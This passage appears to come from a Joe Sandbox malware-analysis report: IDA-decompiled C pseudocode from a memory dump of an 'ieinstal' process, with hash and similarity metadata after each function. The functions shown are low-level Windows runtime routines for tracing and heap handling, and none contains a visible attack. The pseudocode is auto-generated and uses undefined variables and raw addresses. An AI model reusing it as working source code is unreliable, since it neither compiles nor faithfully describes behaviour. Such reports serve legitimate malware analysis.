                        							}
                        						}
                        						return E1ED5D130(_t80, _t99, _t102);
                        					} else {
                        						 *_t51 = 0x1edf5388;
                        						 *((intOrPtr*)(_t51 + 4)) = _t84;
                        						 *_t84 = _t51;
                        						 *0x1edf538c = _t51;
                        						goto L6;
                        					}
                        				}
                        			}





















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5e31dae117d83b5c2b6bd4c8ec8ff71d55964b31693610454e2b8433cf3c982a
                        • Instruction ID: 3e674d8b609499c03d2b435e200fe85003ec5b2a25d2269c2b826bfeed88fc4f
                        • Opcode Fuzzy Hash: 5e31dae117d83b5c2b6bd4c8ec8ff71d55964b31693610454e2b8433cf3c982a
                        • Instruction Fuzzy Hash: 3C01F472A11251CFC304CF19D840B05B7EAEF81721F2A8266E1058B391C770DD42CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E1EDD4015(signed int __eax, signed int __ecx) {
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t10;
                        				signed int _t28;
                        
                        				_push(__ecx);
                        				_t28 = __ecx;
                        				asm("lock xadd [edi+0x24], eax");
                        				_t10 = (__eax | 0xffffffff) - 1;
                        				if(_t10 == 0) {
                        					_t1 = _t28 + 0x1c; // 0x1e
                        					E1ED22280(_t10, _t1);
                        					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                        					E1ED22280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x1edf86ac);
                        					E1ED0F900(0x1edf86d4, _t28);
                        					E1ED1FFB0(0x1edf86ac, _t28, 0x1edf86ac);
                        					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                        					E1ED1FFB0(0, _t28, _t1);
                        					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                        					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                        						L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                        					}
                        					_t10 = L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                        				}
                        				return _t10;
                        			}








                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6a0da8b50a2885c5809f29ed2902d120b4c50fbdbf9b057d3c22c15b5489afa
                        • Instruction ID: 5b62f431f67509d91b6bf547c92bb8082634a2cc45be910b857f36f3908eff9d
                        • Opcode Fuzzy Hash: c6a0da8b50a2885c5809f29ed2902d120b4c50fbdbf9b057d3c22c15b5489afa
                        • Instruction Fuzzy Hash: DB01DF76201A86BFC2109B69DE80E57B7ACFF49664B010725B10887A91CB24FC51C6F1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 61%
                        			E1EDC14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_t32 = __edx;
                        				_t27 = __ebx;
                        				_v8 =  *0x1edfd360 ^ _t35;
                        				_t33 = __edx;
                        				_t34 = __ecx;
                        				E1ED4FA60( &_v60, 0, 0x30);
                        				_v20 = _a4;
                        				_v16 = _a8;
                        				_v28 = _t34;
                        				_v24 = _t33;
                        				_v54 = 0x1034;
                        				if(E1ED27D50() == 0) {
                        					_t21 = 0x7ffe0388;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E1ED4B640(E1ED49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}


















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0a2d529bf258dd71c6ea70a44dbd72f78a00e8de3e4f47ff2ef2ff8f2efb6a9f
                        • Instruction ID: ca5fe087f1b42c7356e99b77bd922ade2bf1d92a7114751b4036908bf9119858
                        • Opcode Fuzzy Hash: 0a2d529bf258dd71c6ea70a44dbd72f78a00e8de3e4f47ff2ef2ff8f2efb6a9f
                        • Instruction Fuzzy Hash: C6019275A00258AFCB00DF69C846FAEB7F8EF44700F50416AF915EB280DB70EA01CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 61%
                        			E1EDC138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_t32 = __edx;
                        				_t27 = __ebx;
                        				_v8 =  *0x1edfd360 ^ _t35;
                        				_t33 = __edx;
                        				_t34 = __ecx;
                        				E1ED4FA60( &_v60, 0, 0x30);
                        				_v20 = _a4;
                        				_v16 = _a8;
                        				_v28 = _t34;
                        				_v24 = _t33;
                        				_v54 = 0x1033;
                        				if(E1ED27D50() == 0) {
                        					_t21 = 0x7ffe0388;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E1ED4B640(E1ED49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}


















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 11b1ada25a8af7f3838293af6606e4efbcab479b04acbb8a418b075245430f13
                        • Instruction ID: f70d3c50b90c94541da3d6218a83d689329d9f1a7e67abfd5f9e7b49dadf4f9f
                        • Opcode Fuzzy Hash: 11b1ada25a8af7f3838293af6606e4efbcab479b04acbb8a418b075245430f13
                        • Instruction Fuzzy Hash: 64019275A00258AFCB00DFA9C842FAEB7F8EF44700F50416AF900EB680DB70EA01C794
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E1ED058EC(intOrPtr __ecx) {
                        				signed int _v8;
                        				char _v28;
                        				char _v44;
                        				char _v76;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t10;
                        				intOrPtr _t16;
                        				intOrPtr _t17;
                        				intOrPtr _t27;
                        				intOrPtr _t28;
                        				signed int _t29;
                        
                        				_v8 =  *0x1edfd360 ^ _t29;
                        				_t10 =  *[fs:0x30];
                        				_t27 = __ecx;
                        				if(_t10 == 0) {
                        					L6:
                        					_t28 = 0x1ece5c80;
                        				} else {
                        					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                        					if(_t16 == 0) {
                        						goto L6;
                        					} else {
                        						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                        					}
                        				}
                        				if(E1ED05943() != 0 &&  *0x1edf5320 > 5) {
                        					E1ED87B5E( &_v44, _t27);
                        					_t22 =  &_v28;
                        					E1ED87B5E( &_v28, _t28);
                        					_t11 = E1ED87B9C(0x1edf5320, 0x1ecebf15,  &_v28, _t22, 4,  &_v76);
                        				}
                        				return E1ED4B640(_t11, _t17, _v8 ^ _t29, 0x1ecebf15, _t27, _t28);
                        			}
















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 86943baa772241824597f65009f2c9d61e25715c5f20c16b759c030c97d82dd4
                        • Instruction ID: f6f7d6196dec6802b83cccaa4cbd37b79c9f60540f7113589f505bebb0cd9f38
                        • Opcode Fuzzy Hash: 86943baa772241824597f65009f2c9d61e25715c5f20c16b759c030c97d82dd4
                        • Instruction Fuzzy Hash: 66018435A005049BC724DA29DC11AAE77A9AF44620FDA0669DC06E7680DF30ED028764
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E1EDBFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				short _v58;
                        				char _v64;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_t24 = __ebx;
                        				_v12 =  *0x1edfd360 ^ _t32;
                        				_t30 = __edx;
                        				_t31 = __ecx;
                        				E1ED4FA60( &_v64, 0, 0x30);
                        				_v24 = _a4;
                        				_v32 = _t31;
                        				_v28 = _t30;
                        				_v58 = 0x266;
                        				if(E1ED27D50() == 0) {
                        					_t18 = 0x7ffe0388;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v64);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E1ED4B640(E1ED49AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                        			}

















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6016b4c8f034431daaa9148dfce7662fb55bb610e63469e0e92ef2e139ac102
                        • Instruction ID: 06327335f25a7b69e71e230136d47c6f60e6feddd347dfdc9b46fe328e2cee99
                        • Opcode Fuzzy Hash: e6016b4c8f034431daaa9148dfce7662fb55bb610e63469e0e92ef2e139ac102
                        • Instruction Fuzzy Hash: BD01D471A00248ABCB14CBA9D846FAEB7B8EF45700F404166F901AB280EA70EA41C7A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E1EDBFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				short _v58;
                        				char _v64;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_t24 = __ebx;
                        				_v12 =  *0x1edfd360 ^ _t32;
                        				_t30 = __edx;
                        				_t31 = __ecx;
                        				E1ED4FA60( &_v64, 0, 0x30);
                        				_v24 = _a4;
                        				_v32 = _t31;
                        				_v28 = _t30;
                        				_v58 = 0x267;
                        				if(E1ED27D50() == 0) {
                        					_t18 = 0x7ffe0388;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v64);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E1ED4B640(E1ED49AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                        			}

















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 747596ed8f0b8bb6b23e7344c24f62f1af0f48faaf21989f63f10138e754066e
                        • Instruction ID: 014e4b8fdc214014bff87f9926963ab76b9eee4f4dd2a7f916e543194fb98e4c
                        • Opcode Fuzzy Hash: 747596ed8f0b8bb6b23e7344c24f62f1af0f48faaf21989f63f10138e754066e
                        • Instruction Fuzzy Hash: FA01D471A00248ABCB14CFA9D846FAEB7B8EF40700F004566F901EB381DA70E941C7A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1EDD1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                        				char _v8;
                        				void* _v11;
                        				unsigned int _v12;
                        				void* _v15;
                        				void* __esi;
                        				void* __ebp;
                        				char* _t16;
                        				signed int* _t35;
                        
                        				_t22 = __ebx;
                        				_t35 = __ecx;
                        				_v8 = __edx;
                        				_t13 =  !( *__ecx) + 1;
                        				_v12 =  !( *__ecx) + 1;
                        				if(_a4 != 0) {
                        					E1EDD165E(__ebx, 0x1edf8ae4, (__edx -  *0x1edf8b04 >> 0x14) + (__edx -  *0x1edf8b04 >> 0x14), __edi, __ecx, (__edx -  *0x1edf8b04 >> 0x14) + (__edx -  *0x1edf8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                        				}
                        				E1EDCAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                        				if(E1ED27D50() == 0) {
                        					_t16 = 0x7ffe0388;
                        				} else {
                        					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				if( *_t16 != 0) {
                        					_t16 = E1EDBFE3F(_t22, _t35, _v8, _v12);
                        				}
                        				return _t16;
                        			}












                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0177004138503fefab988b3406fa0776997ea5198baf19a21e0fe755c4d4cdb8
                        • Instruction ID: e73582419980ffe81d5ba88a12f31ca2a2b50be7053c5d1ef833b45cb2d4d3ad
                        • Opcode Fuzzy Hash: 0177004138503fefab988b3406fa0776997ea5198baf19a21e0fe755c4d4cdb8
                        • Instruction Fuzzy Hash: 750128765047859BC701DF75C940B2AB7E5FB84210F008B29F886836D0EF30E445CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED1B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                        				signed char _t11;
                        				signed char* _t12;
                        				intOrPtr _t24;
                        				signed short* _t25;
                        
                        				_t25 = __edx;
                        				_t24 = __ecx;
                        				_t11 = ( *[fs:0x30])[0x50];
                        				if(_t11 != 0) {
                        					if( *_t11 == 0) {
                        						goto L1;
                        					}
                        					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                        					L2:
                        					if( *_t12 != 0) {
                        						_t12 =  *[fs:0x30];
                        						if((_t12[0x240] & 0x00000004) == 0) {
                        							goto L3;
                        						}
                        						if(E1ED27D50() == 0) {
                        							_t12 = 0x7ffe0385;
                        						} else {
                        							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                        						}
                        						if(( *_t12 & 0x00000020) == 0) {
                        							goto L3;
                        						}
                        						return E1ED87016(_a4, _t24, 0, 0, _t25, 0);
                        					}
                        					L3:
                        					return _t12;
                        				}
                        				L1:
                        				_t12 = 0x7ffe0384;
                        				goto L2;
                        			}








                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction ID: dbe1aea637047f2d189a48404163b9915014ca6b0440bfe90dc2c63a20caab1e
                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction Fuzzy Hash: 6301DF327009C0DFD322C75AD984F6677E9EB46740F0601A5F91ACBAA1D728DC40C321
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E1EDD8ED6(intOrPtr __ecx, intOrPtr __edx) {
                        				signed int _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				short _v62;
                        				char _v68;
                        				signed char* _t29;
                        				intOrPtr _t35;
                        				intOrPtr _t41;
                        				intOrPtr _t42;
                        				signed int _t43;
                        
                        				_t40 = __edx;
                        				_v8 =  *0x1edfd360 ^ _t43;
                        				_v28 = __ecx;
                        				_v62 = 0x1c2a;
                        				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                        				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                        				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                        				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                        				_v24 = __edx;
                        				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                        				if(E1ED27D50() == 0) {
                        					_t29 = 0x7ffe0386;
                        				} else {
                        					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v68);
                        				_push(0x1c);
                        				_push(0x20402);
                        				_push( *_t29 & 0x000000ff);
                        				return E1ED4B640(E1ED49AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                        			}



















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a905c859b6879cf05c17145a10e99401b5a35de925374a4b72460a436b482fa8
                        • Instruction ID: c48a878d39453782f822e51ffc4d2b1033a20e14e77c076ebd28e26017060dda
                        • Opcode Fuzzy Hash: a905c859b6879cf05c17145a10e99401b5a35de925374a4b72460a436b482fa8
                        • Instruction Fuzzy Hash: 25111E74A002599FDB04DFA9C441BAEF7F4FF08300F1446AAE519EB782E7349941CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E1EDD8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				short _v66;
                        				char _v72;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v12 =  *0x1edfd360 ^ _t32;
                        				_t31 = _a8;
                        				_t30 = _a12;
                        				_v66 = 0x1c20;
                        				_v40 = __ecx;
                        				_v36 = __edx;
                        				_v32 = _a4;
                        				_v28 = _a8;
                        				_v24 = _a12;
                        				if(E1ED27D50() == 0) {
                        					_t18 = 0x7ffe0386;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v72);
                        				_push(0x14);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E1ED4B640(E1ED49AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                        			}

















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b868e531423b8c8238fbaa33b4bb6f94fd947bad4d181cb11f3d1dcd73d53d10
                        • Instruction ID: bed4a7ec900f408a5ba5aca0d9f0b821f756d5adb673408c84be53b6ec929a39
                        • Opcode Fuzzy Hash: b868e531423b8c8238fbaa33b4bb6f94fd947bad4d181cb11f3d1dcd73d53d10
                        • Instruction Fuzzy Hash: B3011A75A00259AFCB00DFA9D941AEEB7B8FF58310F50455AF905E7381DB34A9018BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED0DB60(signed int __ecx) {
                        				intOrPtr* _t9;
                        				void* _t12;
                        				void* _t13;
                        				intOrPtr _t14;
                        
                        				_t9 = __ecx;
                        				_t14 = 0;
                        				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                        					_t13 = 0xc000000d;
                        				} else {
                        					_t14 = E1ED0DB40();
                        					if(_t14 == 0) {
                        						_t13 = 0xc0000017;
                        					} else {
                        						_t13 = E1ED0E7B0(__ecx, _t12, _t14, 0xfff);
                        						if(_t13 < 0) {
                        							L1ED0E8B0(__ecx, _t14, 0xfff);
                        							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                        							_t14 = 0;
                        						} else {
                        							_t13 = 0;
                        							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                        						}
                        					}
                        				}
                        				 *_t9 = _t14;
                        				return _t13;
                        			}








                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction ID: 0681183db2e9dc481a9eb0e8c27a8b6b68d4bb2cbf0d427560def0343ce125d7
                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction Fuzzy Hash: D9F0F6372016629BD7325A5A8880F5FB6B69FC1A60F1E0637F5049B384CBB0CC0287E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1ED0B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                        				signed char* _t13;
                        				intOrPtr _t22;
                        				char _t23;
                        
                        				_t23 = __edx;
                        				_t22 = __ecx;
                        				if(E1ED27D50() != 0) {
                        					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                        				} else {
                        					_t13 = 0x7ffe0384;
                        				}
                        				if( *_t13 != 0) {
                        					_t13 =  *[fs:0x30];
                        					if((_t13[0x240] & 0x00000004) == 0) {
                        						goto L3;
                        					}
                        					if(E1ED27D50() == 0) {
                        						_t13 = 0x7ffe0385;
                        					} else {
                        						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                        					}
                        					if(( *_t13 & 0x00000020) == 0) {
                        						goto L3;
                        					}
                        					return E1ED87016(0x14a4, _t22, _t23, _a4, _a8, 0);
                        				} else {
                        					L3:
                        					return _t13;
                        				}
                        			}







                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction ID: 56c0ff0801791d639638ab83e6915212ade903d13883b8b9bed292935aaa10b5
                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction Fuzzy Hash: 3F01F4326146C0EBD3228B6AC904F5A7B9AFF45758F0906A1F9558B6B2D779EC00C325
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E1ED9FE87(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t32;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_v8 =  *0x1edfd360 ^ _t35;
                        				_v16 = __ecx;
                        				_v54 = 0x1722;
                        				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                        				_v28 =  *((intOrPtr*)(__ecx + 4));
                        				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                        				if(E1ED27D50() == 0) {
                        					_t21 = 0x7ffe0382;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E1ED4B640(E1ED49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 48%
                        			E1EDD8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				short _v50;
                        				char _v56;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v8 =  *0x1edfd360 ^ _t32;
                        				_v16 = __ecx;
                        				_v50 = 0x1c2c;
                        				_v24 = _a4;
                        				_v20 = _a8;
                        				_v12 = __edx;
                        				if(E1ED27D50() == 0) {
                        					_t18 = 0x7ffe0386;
                        				} else {
